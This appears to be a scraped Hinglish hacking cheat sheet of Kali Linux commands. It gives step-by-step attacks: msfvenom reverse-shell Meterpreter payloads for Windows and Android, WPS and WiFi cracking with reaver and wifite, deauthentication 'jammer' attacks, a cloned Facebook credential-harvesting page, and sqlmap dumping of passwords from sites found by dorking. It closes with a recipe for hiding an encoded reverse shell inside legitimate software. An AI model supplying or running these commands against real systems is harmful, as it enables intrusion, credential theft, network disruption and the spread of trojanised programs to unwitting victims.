Sie sind auf Seite 1von 6

AUTOMATIC CHANGE MAC ADDRESS IN KALI

STEP 1. diseble network

# ifconfig eth0 down

STEP 2. automatic change(only half)

# macchanger -e eth0

STEP 3. authomatic full change

# macchanger -a eth0

STEP 4. network up

# ifconfig eth0 up

MANUALLY CHANGE MAC ADDRESS IN KALI

1. 12:00:15:B7:46:92

------------------ 99

STEP 1. diseble network

# ifconfig eth0 down

STEP 2. change manually

# ifconfig eth0 hw ether past any mac address

STEP 3.network up

# ifconfig eth0 up
FOOT PRINTING (kamiya hojna)
use in network

1. networking scaning (net me kite ip use hore h)

#nmap -sP 192.168.1.0/24

2. target computer konsa os use kara h or other information

#nmap -sS -A target ip

use in website

1. show information of website

# nmap website name

2. open port information

# nmap -sT target sys ip

3. all information of website

# whois website name

#whatweb website name

WINDOW HACKING
#cd Desktop

#msfvenom -p windows/meterpreter/reverse_tcp lhost=kali ip lport=4444 -f exe -a X86 >


aman.exe

#msfconsole

#use exploit/multi/handler

#set payload windows/meterpreter/reverse_tcp

#set lhost kali ip

#set lhost 4444

#exploit
ANDROID HACKING

#cd Desktop

#msfvenom -p android/meterpreter/reverse_tcp lhost=kali ip lport=4444 R > aman.exe

#msfconsole

#use exploit/multi/handler

#set payload android/meterpreter/reverse_tcp

#set lhost kali ip

#set lhost 4444

#exploit

1 WIFI HACKING
1. wireless lancard up

# ifconfig wlan0 up

2. goto application ----> wireless attempt ------> wifite

# wifite --wep

3. victim ki ssid list show hogi

4. type target number

2 WIFI HACKING
1. sabhi process band karne ke liye

#airmon -ng check kill

2. show lancard

#airmon -ng
3. vlan chalu karne ke liye

#airmon -ng start wlan0

4. wireless monitor ko scan karenge

#airodump -ng wlan0mon

5. jis target ko hack karnaa h uske liye

# reaver -i wlan0mon -c chenel number -b past bsid -vv -K chanel number

WIFI JAMMER ATTACK


1. check the lan card in kali

#iwconfig

2. start the wireless lancard

#airmon -ng start wlan0

3. search the wifi

#airodump-ng wlan0mon

4. kisi particular wifi ko scan karne ke liye ko check karne ke liye kite user us wifi se connect he

#airodump-ng -c chanel number --bssid pastbssid wlan0mon

5. kisi ek station ko jaam karne ke liye

#aireplay-ng -0 0 –a wifibssidpast –c stationmacaddresspast wlan0mon

6. pure network ko jam karne ke liye

#aireplay-ng -0 0 –a wifibssid wlan0mon

Phishing page
1 browser loader

#msf console

2 #use exploit /windows/browser/ms10_046_shortcut_icon_dllloader


3 #exit

4 edit setoolkit file

Goto my computer in kali  etc folder  search setoolkit file  configure setoolkit open  file me
{apche server=on ko off kaenge }

5 #setoolkit

# 1 {social enginnering atack}

# 2 {website attack vector}

# 3 {credential hardvestor attack}

# 2 {site clone}

# kali ip

#enter fack page website name {www.facebook.com}

Dos attack
1. find out vernable website

Go to google type [php?id=1]

2. configure karna h ki vernable h ya nahi

url ke samne (‘)

3. # sqlmap –u urlpast --dbs

4. (3 time yes)

5. ab folder show honge unme se gust karenge ki kisme pass ho sakte h jisme honge us folder
ke andar janaa h

# sqlmap –u url –D folder name --table

6. ab dusre folder me jayenge

# sqlmap –u url –D (1st folder name) –T (2nd folder name) --columns

7.username or pass file millne per use kholenge


# sqlmap –u url –D (1st folder n) –T (2nd folder n) –c user name,password(file n ) –
dump

Combine virus in software

1copy the software and past desktopin kali (esa software jo only run ho bina install ke)

#msfvenom –p windows/meterpreter/reverse_tcp –f exe –e x86/shikata_ga_nai –i 25 –k –x


/root/Desktop/software name.exe lhost=kaliip lport=4444 > newsoftwarename.exe

Das könnte Ihnen auch gefallen